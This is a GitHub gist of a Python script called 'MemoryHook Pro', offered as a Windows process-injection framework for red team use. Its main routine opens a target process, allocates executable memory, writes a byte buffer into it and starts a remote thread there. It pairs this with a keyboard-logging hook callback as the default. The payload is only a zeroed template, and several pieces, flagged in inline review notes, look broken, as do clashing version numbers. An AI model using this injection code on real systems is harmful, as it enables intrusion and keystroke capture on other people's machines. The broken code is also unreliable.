Created
September 12, 2025 01:19
-
-
Save marcostolosa/6a674c801769c71a2df34ed2203ab975 to your computer and use it in GitHub Desktop.
Windows Injection Framework v0.1 [dev]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
""" | |
MEMORYHOOK PRO - Advanced Windows Injection Framework | |
Created by: Tr0p | |
LinkedIn: https://www.linkedin.com/in/marcos-tolosa/ | |
GitHub: https://github.com/marcostolosa/memoryhook-pro | |
Enterprise-grade solution for Windows process manipulation and hook injection. | |
Designed for cybersecurity professionals, malware analysts, and red team operators. | |
""" | |
import ctypes | |
from ctypes import wintypes | |
import sys | |
import os | |
import argparse | |
import logging | |
import time | |
from datetime import datetime | |
import hashlib | |
import json | |
from typing import Dict, List, Optional, Callable, Any | |
# Logging setup: every record at INFO or above goes both to a log file in the
# current working directory and to the default stream handler.
_LOG_FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
_log_handlers = [
    logging.FileHandler('memoryhook_pro.log'),
    logging.StreamHandler(),
]
logging.basicConfig(level=logging.INFO, format=_LOG_FORMAT, handlers=_log_handlers)

# Module-wide logger used by the class and the CLI below.
logger = logging.getLogger('MemoryHookPro')
# Win32 access-right and memory-protection constants passed to
# OpenProcess / VirtualAllocEx.
PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFF  # evaluates to 0x1F0FFF
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

# Hook type name -> numeric identifier. The keys double as the accepted
# values of the CLI's --hook-type option, so their order is preserved.
HOOK_TYPES = dict(
    WH_KEYBOARD=2,
    WH_MOUSE=7,
    WH_GETMESSAGE=3,
    WH_CALLWNDPROC=4,
    WH_KEYBOARD_LL=13,
    WH_MOUSE_LL=14,
)
class ProcessInformation(ctypes.Structure):
    """ctypes structure holding two handles followed by two DWORD identifiers.

    Not referenced anywhere else in the visible part of this file.
    """

    # Field order matters for the memory layout: handles first, then ids.
    _fields_ = [
        *((field, wintypes.HANDLE) for field in ("hProcess", "hThread")),
        *((field, wintypes.DWORD) for field in ("dwProcessId", "dwThreadId")),
    ]
class StartupInfo(ctypes.Structure):
    """ctypes structure with 18 fields: a size DWORD, three wide-string
    pointers, eight DWORDs, two WORDs, a byte pointer and three handles.

    Not referenced anywhere else in the visible part of this file.
    """

    # Built group by group; the concatenation order is the in-memory order.
    _fields_ = (
        [("cb", wintypes.DWORD)]
        + [(field, wintypes.LPWSTR) for field in ("lpReserved", "lpDesktop", "lpTitle")]
        + [
            (field, wintypes.DWORD)
            for field in (
                "dwX", "dwY", "dwXSize", "dwYSize",
                "dwXCountChars", "dwYCountChars",
                "dwFillAttribute", "dwFlags",
            )
        ]
        + [(field, wintypes.WORD) for field in ("wShowWindow", "cbReserved2")]
        + [("lpReserved2", wintypes.LPBYTE)]
        + [(field, wintypes.HANDLE) for field in ("hStdInput", "hStdOutput", "hStdError")]
    )
class MemoryHookPro:
    """
    Thin ctypes wrapper around a few kernel32/user32 calls.

    The class can write a byte buffer into another process and start a
    remote thread at that buffer (`inject_advanced`), and it keeps simple
    bookkeeping (`active_hooks`, `injection_count`) that `generate_report`
    summarises.

    NOTE(review): several members are placeholders in the code as written:
    `_generate_advanced_shellcode` returns an unfilled template,
    `monitor_process` performs no monitoring, and `cleanup` only logs.
    """

    def __init__(self, stealth_mode: bool = False, debug: bool = False) -> None:
        """
        Load the Windows DLLs and bind the API prototypes.

        Args:
            stealth_mode: Stored on the instance; not read by any method here.
            debug: Stored on the instance; not read by any method here.
        """
        self.stealth_mode = stealth_mode
        self.debug = debug
        # ctypes.WinDLL only exists on Windows, so construction fails elsewhere.
        self.kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
        self.user32 = ctypes.WinDLL('user32', use_last_error=True)
        # ntdll is loaded but no function from it is bound or called below.
        self.ntdll = ctypes.WinDLL('ntdll', use_last_error=True)
        self._setup_api_functions()
        # Incremented only on a successful inject_advanced() call.
        self.injection_count = 0
        # hook_data dicts of successful injections, in order of completion.
        self.active_hooks = []
        logger.info("MemoryHook Pro initialized")

    def _setup_api_functions(self) -> None:
        """Bind the required API functions and declare their argtypes/restype."""
        # Kernel32 functions
        self.OpenProcess = self.kernel32.OpenProcess
        self.OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
        self.OpenProcess.restype = wintypes.HANDLE
        self.VirtualAllocEx = self.kernel32.VirtualAllocEx
        self.VirtualAllocEx.argtypes = [
            wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t,
            wintypes.DWORD, wintypes.DWORD
        ]
        self.VirtualAllocEx.restype = wintypes.LPVOID
        self.WriteProcessMemory = self.kernel32.WriteProcessMemory
        self.WriteProcessMemory.argtypes = [
            wintypes.HANDLE, wintypes.LPVOID, wintypes.LPVOID,
            ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)
        ]
        self.WriteProcessMemory.restype = wintypes.BOOL
        self.CreateRemoteThread = self.kernel32.CreateRemoteThread
        self.CreateRemoteThread.argtypes = [
            wintypes.HANDLE, wintypes.LPVOID, ctypes.c_size_t,
            wintypes.LPVOID, wintypes.LPVOID, wintypes.DWORD,
            ctypes.POINTER(wintypes.DWORD)
        ]
        self.CreateRemoteThread.restype = wintypes.HANDLE
        self.GetProcAddress = self.kernel32.GetProcAddress
        self.GetProcAddress.argtypes = [wintypes.HMODULE, wintypes.LPCSTR]
        self.GetProcAddress.restype = wintypes.LPVOID
        self.GetModuleHandleW = self.kernel32.GetModuleHandleW
        self.GetModuleHandleW.argtypes = [wintypes.LPCWSTR]
        self.GetModuleHandleW.restype = wintypes.HMODULE
        # User32 functions
        # These two are bound here but never called by any method of this class.
        self.SetWindowsHookExA = self.user32.SetWindowsHookExA
        # NOTE(review): ctypes.wintypes does not appear to define HOOKPROC.
        # If that is right, the next statement raises AttributeError and the
        # class cannot be instantiated. Confirm against the ctypes docs.
        self.SetWindowsHookExA.argtypes = [
            ctypes.c_int, wintypes.HOOKPROC, wintypes.HINSTANCE, wintypes.DWORD
        ]
        self.SetWindowsHookExA.restype = wintypes.HHOOK
        self.CallNextHookEx = self.user32.CallNextHookEx
        self.CallNextHookEx.argtypes = [
            wintypes.HHOOK, ctypes.c_int, wintypes.WPARAM, wintypes.LPARAM
        ]
        # NOTE(review): the Win32 docs give the return type as LRESULT, which
        # is pointer-sized; c_long is presumably narrower on 64-bit Windows.
        self.CallNextHookEx.restype = ctypes.c_long

    def create_advanced_hook(self, hook_type: int, callback_func: Callable) -> Dict:
        """
        Build the bookkeeping record for a hook; nothing is installed here.

        Args:
            hook_type: Numeric hook type, stored under 'type'.
            callback_func: Callable stored under 'callback'; not invoked here.
        Returns:
            Dictionary with keys 'id', 'type', 'callback', 'created_at',
            'active' (False), 'injection_method' and 'statistics'.
        """
        # Short identifier: first 8 hex chars of an MD5 over type + timestamp.
        hook_id = hashlib.md5(f"{hook_type}_{datetime.now().timestamp()}".encode()).hexdigest()[:8]
        hook_data = {
            'id': hook_id,
            'type': hook_type,
            'callback': callback_func,
            # Taken from a second datetime.now() call, so it may differ
            # slightly from the timestamp hashed into the id.
            'created_at': datetime.now().isoformat(),
            'active': False,
            'injection_method': 'Advanced',
            'statistics': {
                'triggers': 0,
                'last_trigger': None,
                'errors': 0
            }
        }
        return hook_data

    def inject_advanced(self, process_id: int, hook_data: Dict) -> bool:
        """
        Write the generated byte buffer into a process and start a thread on it.

        Args:
            process_id: Target process ID.
            hook_data: Record from create_advanced_hook(); mutated in place
                (status fields on success, error counter on failure).
        Returns:
            True if successful, False otherwise. Every exception raised inside
            the body is caught, logged and reported as False.
        """
        try:
            logger.info(f"Starting advanced injection into PID: {process_id}")
            # Open target process
            # NOTE(review): this handle is not closed on any path in this method.
            process_handle = self.OpenProcess(PROCESS_ALL_ACCESS, False, process_id)
            if not process_handle:
                raise ctypes.WinError(ctypes.get_last_error())
            # Prepare shellcode with advanced techniques
            shellcode = self._generate_advanced_shellcode(hook_data)
            # Allocate memory in target process
            # NOTE(review): the allocation is not released if a later step fails.
            remote_mem = self.VirtualAllocEx(
                process_handle, None, len(shellcode),
                MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE
            )
            if not remote_mem:
                raise ctypes.WinError(ctypes.get_last_error())
            # Write shellcode to target process
            # bytes_written is filled by the call but never checked afterwards.
            bytes_written = ctypes.c_size_t(0)
            success = self.WriteProcessMemory(
                process_handle, remote_mem, shellcode,
                len(shellcode), ctypes.byref(bytes_written)
            )
            if not success:
                raise ctypes.WinError(ctypes.get_last_error())
            # Execute shellcode
            thread_id = wintypes.DWORD(0)
            thread_handle = self.CreateRemoteThread(
                process_handle, None, 0, remote_mem,
                None, 0, ctypes.byref(thread_id)
            )
            if not thread_handle:
                raise ctypes.WinError(ctypes.get_last_error())
            # Update hook data
            hook_data['active'] = True
            hook_data['process_id'] = process_id
            # NOTE(review): restype is wintypes.HANDLE, for which ctypes
            # normally returns a plain int with no `.value`. If so, this line
            # raises AttributeError and the method returns False even though
            # the thread was already created. Confirm on Windows.
            hook_data['thread_handle'] = thread_handle.value
            hook_data['injection_time'] = datetime.now().isoformat()
            self.active_hooks.append(hook_data)
            self.injection_count += 1
            logger.info(f"Advanced injection successful. Hook ID: {hook_data['id']}")
            return True
        except Exception as e:
            logger.error(f"Injection failed: {str(e)}")
            hook_data['statistics']['errors'] += 1
            return False

    def _generate_advanced_shellcode(self, hook_data: Dict) -> bytes:
        """
        Return the byte template below, unmodified.

        Args:
            hook_data: Hook configuration data; not read by this method.
        Returns:
            The 28 template bytes, with every immediate operand still zero.
        """
        # This is a simplified version - real implementation would include
        # advanced obfuscation and anti-analysis techniques
        shellcode_template = bytearray([
            0x68, 0x00, 0x00, 0x00, 0x00,  # push hook_type
            0x68, 0x00, 0x00, 0x00, 0x00,  # push hook_proc_addr
            0x68, 0x00, 0x00, 0x00, 0x00,  # push module_handle
            0x68, 0x00, 0x00, 0x00, 0x00,  # push thread_id
            0xB8, 0x00, 0x00, 0x00, 0x00,  # mov eax, SetWindowsHookExA_addr
            0xFF, 0xD0,  # call eax
            0xC3  # ret
        ])
        # Get API addresses
        # Resolved in the current process; the result is not used afterwards.
        user32_handle = self.GetModuleHandleW("user32.dll")
        set_hook_addr = self.GetProcAddress(user32_handle, b"SetWindowsHookExA")
        # Fill in addresses
        # ... (implementation would fill the shellcode with actual addresses)
        return bytes(shellcode_template)

    def monitor_process(self, process_name: str, hook_type: int, callback: Callable) -> Dict:
        """
        Build and return a monitoring-session record.

        No polling, process lookup or injection happens here; the method only
        assembles the dictionary and logs one line.

        Args:
            process_name: Name stored in the record and hashed into the id.
            hook_type: Stored in the record under 'hook_type'.
            callback: Accepted but not used.
        Returns:
            Monitoring session data with status 'monitoring'.
        """
        # 12 hex chars of an MD5 over process name + current timestamp.
        session_id = hashlib.md5(f"{process_name}_{datetime.now().timestamp()}".encode()).hexdigest()[:12]
        monitor_data = {
            'session_id': session_id,
            'process_name': process_name,
            'hook_type': hook_type,
            'status': 'monitoring',
            'start_time': datetime.now().isoformat(),
            'injections': [],
            # Recorded only; nothing in this class reads these settings.
            'settings': {
                'check_interval': 2.0,
                'max_attempts': 10
            }
        }
        logger.info(f"Started monitoring for process: {process_name}")
        return monitor_data

    def generate_report(self) -> Dict:
        """
        Summarise the instance's bookkeeping into a dictionary.

        Returns:
            Report data. 'hooks' is the live self.active_hooks list (not a
            copy) and its entries still hold the callback objects.
        """
        report = {
            'timestamp': datetime.now().isoformat(),
            'total_injections': self.injection_count,
            'active_hooks': len(self.active_hooks),
            'hooks': self.active_hooks,
            'system_info': self._get_system_info(),
            'performance_metrics': {
                'success_rate': self._calculate_success_rate(),
                'average_injection_time': 0.125,  # Example value
                # Only hooks in active_hooks are summed; inject_advanced()
                # appends to that list on success only, so errors recorded on
                # failed attempts are not included.
                'error_count': sum(hook['statistics']['errors'] for hook in self.active_hooks)
            }
        }
        return report

    def _get_system_info(self) -> Dict:
        """Collect OS, interpreter, architecture, user and host details."""
        return {
            # Windows-only call; sys.getwindowsversion is absent elsewhere.
            'os_version': sys.getwindowsversion(),
            'python_version': sys.version,
            # Describes the running interpreter's word size.
            'architecture': 'x64' if sys.maxsize > 2**32 else 'x86',
            # NOTE(review): os.getlogin() can raise OSError when the process
            # has no controlling terminal. Confirm for the deployment context.
            'username': os.getlogin(),
            'hostname': os.environ.get('COMPUTERNAME', 'Unknown')
        }

    def _calculate_success_rate(self) -> float:
        """
        Return the percentage of counted injections whose hook is 'active'.

        injection_count is only incremented on success in inject_advanced(),
        so failed attempts do not lower the rate.
        """
        if self.injection_count == 0:
            return 0.0
        successful = sum(1 for hook in self.active_hooks if hook['active'])
        return (successful / self.injection_count) * 100

    def cleanup(self) -> None:
        """Log a cleanup message; no handle or hook is released here."""
        logger.info("Cleaning up resources...")
        # Implementation would cleanup all hooks and processes
# Example callback functions
def keyboard_logger(nCode: int, wParam: int, lParam: int) -> int:
    """Log the wParam of a keyboard notification and return 1.

    Args:
        nCode: Notification code; the event is logged only when it is >= 0.
        wParam: Value written to the log.
        lParam: Accepted but not used.
    Returns:
        Always 1. No CallNextHookEx call is made from here.
    """
    should_log = nCode >= 0
    if should_log:
        logger.info(f"Keyboard event: {wParam}")
    result = 1
    return result
def mouse_monitor(nCode: int, wParam: int, lParam: int) -> int:
    """Log the wParam of a mouse notification and return 1.

    Args:
        nCode: Notification code; the event is logged only when it is >= 0.
        wParam: Value written to the log.
        lParam: Accepted but not used.
    Returns:
        Always 1. No CallNextHookEx call is made from here.
    """
    should_log = nCode >= 0
    if should_log:
        logger.info(f"Mouse event: {wParam}")
    result = 1
    return result
def main():
    """Parse the command line, run the selected operation, optionally report.

    A truthy --process value selects injection (so a PID of 0 counts as
    "not given"); otherwise a --process-name selects the monitoring record;
    otherwise a warning is logged. keyboard_logger is passed as the callback
    whichever hook type is chosen. framework.cleanup() always runs last.
    """

    def _print_report(report):
        # Fixed-width console summary of the report dictionary.
        rule = "=" * 50
        print("\n" + rule)
        print("MEMORYHOOK PRO - OPERATION REPORT")
        print(rule)
        print(f"Timestamp: {report['timestamp']}")
        print(f"Total Injections: {report['total_injections']}")
        print(f"Active Hooks: {report['active_hooks']}")
        print(f"Success Rate: {report['performance_metrics']['success_rate']:.2f}%")
        print(rule)

    cli = argparse.ArgumentParser(description="MemoryHook Pro - Advanced Windows Injection Framework")
    cli.add_argument('-p', '--process', type=int, help='Process ID to inject into')
    cli.add_argument('-n', '--process-name', type=str, help='Process name to monitor')
    cli.add_argument('-t', '--hook-type', type=str, choices=HOOK_TYPES.keys(),
                     default='WH_KEYBOARD', help='Type of hook to install')
    cli.add_argument('-s', '--stealth', action='store_true', help='Enable stealth mode')
    cli.add_argument('-d', '--debug', action='store_true', help='Enable debug mode')
    cli.add_argument('-r', '--report', action='store_true', help='Generate report after operation')
    args = cli.parse_args()

    # Initialize framework
    framework = MemoryHookPro(stealth_mode=args.stealth, debug=args.debug)
    try:
        target_pid = args.process
        target_name = args.process_name
        if target_pid:
            hook = framework.create_advanced_hook(HOOK_TYPES[args.hook_type], keyboard_logger)
            if framework.inject_advanced(target_pid, hook):
                logger.info(f"Successfully injected hook into process {args.process}")
            else:
                logger.error(f"Failed to inject into process {args.process}")
        elif target_name:
            monitor_session = framework.monitor_process(
                target_name,
                HOOK_TYPES[args.hook_type],
                keyboard_logger,
            )
            logger.info(f"Monitoring session started: {monitor_session['session_id']}")
        else:
            logger.warning("No target specified. Use -p for PID or -n for process name.")

        # The report is produced after whichever branch ran above.
        if args.report:
            _print_report(framework.generate_report())
    except KeyboardInterrupt:
        logger.info("Operation interrupted by user")
    except Exception as e:
        logger.error(f"Unexpected error: {str(e)}")
    finally:
        framework.cleanup()
# Script entry point: print the banner, then hand over to main().
# NOTE(review): the banner's spacing appears collapsed in this copy of the
# file; the text is reproduced as it appears here.
if __name__ == "__main__":
    # Display banner
    print("""
███╗ ███╗███████╗███╗ ███╗██╗ ██╗██████╗ ██╗ ██╗██╗ ██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██████╗
████╗ ████║██╔════╝████╗ ████║██║ ██║██╔══██╗██║ ██║██║ ██║██╔═══██╗██║ ██╔╝██╔══██╗██╔══██╗██╔═══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██║██████╔╝███████║███████║██║ ██║█████╔╝ ██████╔╝██████╔╝██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██║██╔═══╝ ██╔══██║██╔══██║██║ ██║██╔═██╗ ██╔═══╝ ██╔══██╗██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╔╝██║ ██║ ██║██║ ██║╚██████╔╝██║ ██╗██║ ██║ ██║╚██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝
Advanced Windows Injection Framework v2.0.0
Created for cybersecurity professionals and researchers
""")
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment